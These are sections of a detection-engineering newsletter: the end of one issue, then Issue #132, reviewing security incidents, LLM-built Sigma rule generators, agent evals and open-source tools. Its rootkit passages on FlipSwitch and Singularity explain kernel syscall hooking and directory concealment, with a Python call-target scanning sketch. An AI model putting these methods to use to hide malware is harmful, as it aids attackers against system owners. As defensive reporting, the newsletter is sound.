Network and security appliance vendor F5 posted a harrowing security incident update involving a “highly sophisticated nation-state threat actor.” This threat actor had long-term access to their product development environment, and according to cvedetails, F5 has close to 300 products. With the ability to download code and knowledge bases, a well-resourced actor could use that access to do product research and reverse engineering for competitive products in their home country, or to ease vulnerability research.


Securing the Future: Changes to Internet Explorer Mode in Microsoft Edge by Gareth Evans

The Microsoft Edge security team shipped a new secure-by-default configuration for Internet Explorer Mode in Microsoft Edge. This is the first time I’ve heard of Internet Explorer Mode, and I already had a chuckle reading this because I had a feeling it had to do with active exploitation of legacy Internet Explorer code shipped inside Edge, and voila!

The team seemed to plug the holes of some of the exploit vectors, but they switched off certain UI elements by default to limit the blast radius of threat actors abusing the backward-compatible technology. Basically, if you have to use this mode, it’s shipped with minimal functionality to access the resources you need, and an administrator must turn on any additional functionality.


Rubygems.org AWS Root Access Event – September 2025 by Shan Cureton / Ruby Central

Long-lived access key security incidents strike again! Cureton, the Executive Director for Ruby Central, published a detailed security incident report after a blog post disclosed to the open source community that a former maintainer had production access to Ruby’s AWS account. The blog showed several screenshots and a CLI command that purported to show the former maintainer retained access via an AWS Access Key.

In response to the post, the Ruby Central team performed a series of containment actions to remove this access, and did not accuse the maintainer of anything malicious. But the post and this incident report show how hard it is to maintain a governance structure for an open-source non-profit that relies on contractors and volunteers to maintain the project.


Singularity: Deep Dive into a Modern Stealth Linux Kernel Rootkit by MatheuZSec

Two weeks in a row, I’ve read some great pieces on modern Linux Kernel Rootkits, so it was nice to see this one looked at a rootkit leveraging ftrace style hooking for its persistence and evasion capabilities. MatheusZ breaks down the source code within the rootkit itself, including the hooking techniques, and highlights some differentiators between this rootkit and others in the space. The attention to detail the rootkit creator put towards concealment of directories, for example, shows how much of a cat-and-mouse game this is.

When you hide a directory, you may not be able to see its name or contents via list commands, but you may leak metadata that a hidden directory exists. For example, if a directory contains three subdirectories and you hide one, ls will show only two subdirectories. However, the parent directory’s link count (visible via stat or ls -ld) would still reflect three subdirectories unless adjusted.

This discrepancy between the visible subdirectory count and the link count is a forensic artifact that can reveal hidden directories. This rootkit accounts for the discrepancy and hooks a function to compute the number of links for backdoored directories accordingly.


🔗 Open Source

ngsoti/rulezet-core

This codebase serves the complete application running on rulezet.org. It looks like an open source version of detections.ai that you can host yourself. It pulls in open-source rulesets, and you can use it to manage your own rules via a community-style setup.


eset/malware-ioc

ESET’s long-running repository of malware IOCs is based on blog posts and investigations they’ve done over the years. It’s cool to see commits from close to a decade ago. Each subdirectory has a README describing the malware family and contains the associated IOCs.


KittenBusters/CharmingKitten

For the last two or so weeks, KittenBusters has been publishing commits to this repository that detail the operations behind Iran’s IRGC-IO Counterintelligence division. It is split up into “episodes”, and so far, three episodes have been published. It contains sensitive documents and malware code, and it looks like they will start doxxing certain officials in upcoming episodes.


cisagov/LME

Logging Made Easy (LME) is CISA’s initiative on leveraging open source tools to enable a security operations function on a budget. It uses Wazuh and Elasticsearch, and the target audience is smaller shops with a small security team or none at all. Probably very helpful for state and local municipalities that CISA works with during incidents.


DEW #132 - Linux Rootkits Evolution, LLM Rule Evals, Oracle 0-day exploitation

8 October 2025 at 14:03

Welcome to Issue #132 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week


  • I spent the weekend hiking in the White Mountains in New Hampshire with my family. Turns out hiking is much harder when you have to carry kids who are strapped in a backpack

  • I got excited for a new season of The Amazing Race, and all of the competitors are from a separate reality show?? It’s not good

  • I’m staying away from all discussion around Taylor Swift’s new album


This week’s sponsor: Material Security

No More Babysitting the Security of Your Google Workspace

While your employees communicate via email and access sensitive files, Material quietly contains what’s lying in wait—phishing attacks in Gmail, exposed Drive files, and suspicious account activity. Agentless and API-first, it stops attacks and triages user reports with AI while running safe, automatic fixes so you don’t have to hover. Search everything in seconds, stream alerts to your SIEM, and audit with detailed access logs.

Simplify Your Google Workspace Security


💎 Detection Engineering Gem 💎

FlipSwitch: a Novel Syscall Hooking Technique by Remco Sprooten and Ruben Groenewoud

I first cut my teeth on writing malware when I was the red team captain at my alma mater’s yearly cybersecurity competition. I took a special interest in writing malware for Linux for several reasons. It was a special combination of operating systems knowledge and nuanced differences between kernel versions and Linux distros. It also felt harder than Windows in peculiar ways. For example, Windows is extremely good at backwards compatibility, so malware that interacts with the kernel in all kinds of ways stays consistent between versions, whereas in Linux, a single kernel version update can break backwards compatibility for legitimate and malicious software alike.

That’s what brings us to FlipSwitch. Elastic Security Researchers Sprooten and Groenewoud did a deep dive on the latest 6.9 version of the Linux Kernel and inspected how changes to an array that stores syscall addresses render a classic Kernel rootkit technique useless. The method relies on hooking addresses in the sys_call_table array to point to attacker-controlled code before trampolining back to the original syscall.

Pulled from Elastic’s blog

Line 10 is the change that killed rootkits like Diamorphine. This is where FlipSwitch comes in.

The Elastic team did a fantastic breakdown in their blog, so I’ll give my synopsis. The technique involves searching the running kernel’s memory for the x86 near-call opcode (0xe8) associated with the syscalls that FlipSwitch wants to hook. When you load the malicious kernel module, you can leverage its privilege to scan for 0xe8, enumerate the offset address of each specific function you want to hook via the new x64_sys_call dispatcher, then patch it.

It’s pretty elegant, and it shows how a singular protection can kill one class of techniques but open up another class to exploit.
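As a user-space illustration of the scanning step (my own simplification, not Elastic's PoC): 0xe8 is the x86-64 near-call opcode, followed by a signed 32-bit displacement relative to the next instruction. The sketch below resolves those displacements to absolute targets in a byte buffer, which is conceptually how you would locate the dispatcher's call to the one handler you want to patch.

```python
import struct

def find_call_targets(code: bytes, base: int):
    """Scan a code buffer for x86-64 near calls (opcode 0xe8) and resolve
    each rel32 displacement to its absolute target address.

    Naive byte scan: a stray 0xe8 inside another instruction's operand
    will produce a false positive, so callers must validate each target.
    """
    targets = []
    i = 0
    while (i := code.find(0xe8, i)) != -1:
        if i + 5 > len(code):  # need opcode + 4 displacement bytes
            break
        rel32 = struct.unpack_from("<i", code, i + 1)[0]
        next_ip = base + i + 5  # rel32 is relative to the next instruction
        targets.append((base + i, (next_ip + rel32) & 0xFFFFFFFFFFFFFFFF))
        i += 1
    return targets
```

In the kernel module, the same arithmetic runs over x64_sys_call's code, and patching means overwriting the matched displacement so the call lands in attacker-controlled code instead.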


🔬 State of the Art

Bridging the Gap: How I used LLM Agents to Translate Threat Intelligence into Sigma Detections by Giulia Consonni

I’m glad to see more research and homelab-style blogs on how to build detection engineering agentic systems. It demystifies some of the hype surrounding products in this space, and just like Splunk did with SIEM by creating a community edition, it makes it easier for people to enter our field. I immediately clicked on this post because the title really excited me, and the post didn’t disappoint!

Consonni’s project here involves building out an LLM Agent system that translates threat intelligence into detection rules. They leveraged http://crewai.com/ (which I had never heard of), a platform that helps host AI Agents, provides an SDK for writing those agents, and makes it easy to focus on building the system rather than worrying about architecture and scale. Consonni started with a prompt that included the whole workflow of “read report → extract TTPs → create rules,” and it did a terrible job due to the broadness of the request. After refining the process with a multi-agent setup, more specific prompting, and a switch of foundation models, the resulting rules were impressive.


More than “plausible nonsense”: A rigorous eval for ADÉ, our security coding agent by Bobby Filar and Dr. Anna Bertiger

This post is an EXCELLENT read after the LLM detection rule creator post by Consonni listed above.

Determining the performance of a machine learning model is as old as the field of statistics itself. The basic premise behind performance measurement is building a predictive system, testing it against real-world data, and measuring its efficacy. Sounds familiar, right? Just like detection rules.

Naturally, LLMs should have the same type of evaluation criteria for implementers to trust and verify performance. I hadn’t seen a comprehensive evaluation framework for detection rules until I came across this post by Filar and Dr. Bertiger. The Sublime team built a detection evaluation framework for their LLM-backed detection engineer, dubbed ADÉ. The idea here is that the team tried to encode success metrics for new detection rules written in the Sublime DSL. These success metrics should be familiar to long-time readers of this newsletter and to those who have read my Field Manual posts.

They split evaluations into three steps: precision, robustness, and cost to deploy and run. The lovely thing about these three evaluations is that they really capture how detection engineers think about testing rules before they deploy them.

  • Precision measures accuracy and net-new coverage, which, according to Filar and Dr. Bertiger, is the marginal value a rule adds when running alongside existing detections against known campaigns.

  • The robustness step dissects the rules’ abstract syntax tree to identify and penalize lower-value detection mechanisms, such as IP matching. Think of this as penalizing the lower parts of the Pyramid of Pain.

  • The cost step looks at how many attempts the model took to generate a production-quality rule, the time to deployment of that rule, and the runtime cost of the rule in production.
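As a toy illustration of the robustness idea only (the rule format, regexes, and penalty weights below are all invented; Sublime's real evaluation analyzes the rule's AST), you can down-score rules that key on low Pyramid-of-Pain artifacts:

```python
import re

# Invented penalty table: brittle, low Pyramid-of-Pain artifacts cost more.
PENALTIES = [
    (re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"), 0.4),  # literal IP addresses
    (re.compile(r"\b[a-f0-9]{32,64}\b"), 0.3),          # MD5/SHA file hashes
]

def robustness_score(rule_text: str) -> float:
    """Score a rule from 1.0 downward, penalizing brittle indicators."""
    score = 1.0
    for pattern, penalty in PENALTIES:
        if pattern.search(rule_text):
            score -= penalty
    return max(score, 0.0)
```

A behavioral rule like `process.name == 'certutil.exe'` keeps its 1.0 here, while one anchored on `dst.ip == '10.9.9.9'` is penalized, which mirrors the AST-level idea without the AST.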

They list evaluations of several rules towards the end of the post, and I’m impressed by their performance. They compare the results to a human-written rule, and it appears to have performed well in some detection types against humans but underperformed in others. However, the idea here (in my opinion) isn’t to replace humans, but to augment us, and I think this framework helps achieve that.


How to Create a Hunting Hypothesis by Deniz Topaloglu

The best way to threat hunt is to challenge assumptions. In my experience, these assumptions typically fall into several buckets, including:

  • Rules that fail to capture threat activity

  • Telemetry sources contain threat activity that we haven’t accounted for

  • Threat intelligence informs us of something we should be aware of in the pyramid of pain

Forming a hypothesis, then, takes assumptions and tries to challenge them to uncover gaps in rules or telemetry, and in the worst case, find an incident that you’ve missed. It’s a formulaic process, but this post shows how powerful threat hunting can be when you lay out your assumptions and what you know so you can deep dive into a hypothesis.

Topaloglu starts with a piece of threat intelligence, maps out potential TTPs in MITRE, shows an example network diagram, and then creates a hunting plan. They lay out several scenarios and their corresponding SIEM search queries in several languages, and continue on to post-hunt activities for aspiring hunters to follow up on because threat hunts should provide more value than just confirming whether activity is present or not in a network.


The Great SIEM Bake-Off: Is Your SOC About to Get Burned? by Matt Snyder

Choosing a SIEM is like selecting a business partner. You need to ensure that you understand the strengths and weaknesses of each other and create an operating model to compensate for them. It’s great to see a blog exploring the topic of procuring a SIEM and the pain associated with switching from one deployment to another. This piece is beneficial for aspiring analysts or detection and response engineers who’ve never been through this type of exercise, because it truly feels like a mountain to climb that can put your company and productivity at risk.

Snyder points out five key areas of concern where switching costs can kill productivity: ingest, search, enrichment, rules and administration. SIEM vendors should help you understand each component during a demo. Even then, many demos showcase the best parts of the technology, so a bake-off between SIEM vendors, via proofs of concept, and Snyder’s linked Maturity Tracker, can alleviate much of the uncertainty behind these exercises.


☣️ Threat Landscape

CrowdStrike Identifies Campaign Targeting Oracle E-Business Suite via Zero-Day Vulnerability (now tracked as CVE-2025-61882) by CrowdStrike

The large vulnerability news du jour is a remote code execution in Oracle E-Business Suite tracked under CVE-2025-61882. The CrowdStrike research team made this post detailing their observations as threat actors and researchers alike conduct mass exploitation to take advantage of the vulnerability.

The exploit chain involves a series of crafted payloads to two JSP endpoints, where an unauthenticated attacker uploads a malicious XSLT file. This, in turn, creates an outbound Java request to an attacker-controlled command and control server to load a webshell on victim machines.

The remarkable aspect here is how the exploit was disseminated. Oracle made a public post with IOCs, a PoC was posted on October 3, and according to CrowdStrike, threat actors under the ShinyHunters moniker posted an exploit file to their main Telegram channel.


Red Hat Consulting breach puts over 5000 high profile enterprise customers at risk — in detail by Kevin Beaumont

Red Hat Consulting, the technology services arm of Red Hat, allegedly suffered a data breach by a threat actor group dubbed “Crimson Collective.” It’s unclear how the breach happened, but the group began posting screenshots of the pilfered victim data. Beaumont uncovered some interesting details about this threat actor group, with the assistance of Brian Krebs. They seem to overlap with Scattered Spider/Shiny Hunters, and one of the Telegram posts made by the group had a “Miku” signature at the end. Miku is an alleged member of Scattered Spider who was arrested last year and is under house arrest.

The victim details were posted on the Scattered LAPSUS$ Hunters victim leak site, and it appears to contain a trove of customer data from Red Hat Consulting, including some sensitive information.


DPRK IT Workers: Inside North Korea’s Crypto Laundering Network by Chainalysis

My favorite thing about reading Chainalysis blogs is getting a glimpse into how money laundering works at a cryptocurrency scale. Unless you’re a freak of nature and read indictments or court documents with detailed notes on traditional money laundering techniques, it’s rare to see how criminal and nation-state operations do the hard work of funneling money.

So, in this blog, the Chainalysis team studied the tactics, techniques and procedures of DPRK IT Worker laundering. They have a structured approach to taking payment in stablecoins, laundering it to a “consolidation” worker, and eventually offloading the consolidated funds to fiat.


Don’t Sweat the *Fix Techniques by Tyler Bohlmann

When I first read about ClickFix, I didn’t think it would be a successful approach to infection and initial access. The premise was a bit crazy: you funnel victims to a website, socially engineer them to believe there’s a problem with their computer, and convince them to willingly copy and paste a malicious command into their terminal.

Well, I was wrong: this technique works beautifully, and according to Bohlmann, Huntress has observed a 600%+ increase in these styles of attack since their inception last year. In this post, they review the different styles of ClickFix, the attack chains, and the clever ways they trick users into running the malicious payloads.


🔗 Open Source

1337-42/FlipSwitch-dev

Sprooten’s FlipSwitch PoC repo, referenced in the Gem above. It does more than just demonstrate the technique; you can use this as a rootkit kernel module in the latest versions of the Linux Kernel, and it supports some fun obfuscation techniques to make it harder to find.


ti-to-sigma-crew

Threat intelligence report to Sigma rule generator. This repository is based on the research linked above by Consonni. It’s a templated CrewAI application that looks pretty easy to use: you add knowledge files, such as example detection rules, and it appears to use a SQLite database for the RAG components.


matt-snyder-stuff/Security-Maturity-Tracking

Simple yet effective security maturity tracking framework for a security operations program. The repository lists each capability you want to track, such as SIEM, Threat Hunting and Threat Intelligence, and you can create maturity matrices for each one and track progress. These are generally pretty good for presenting program development up to leadership.


thalesgroup-cert/suspicious

Open-source anti-phishing and investigation application for investigators, analysts and CERT folks. You set it up, tie it to an inbox, have users forward suspicious emails to it, and it’ll pull apart the email, perform threat intel lookups and present a report for further analysis.


CERT-Polska/karton

A dynamic malware analysis platform where you can build malware processing backends all in Python. It comes with several backends out of the box, including a malware sandbox, an archive extractor, and a malware configuration extractor. It looks pretty easy to write your own, and you can submit it via an API or the dashboard to extend functionality.

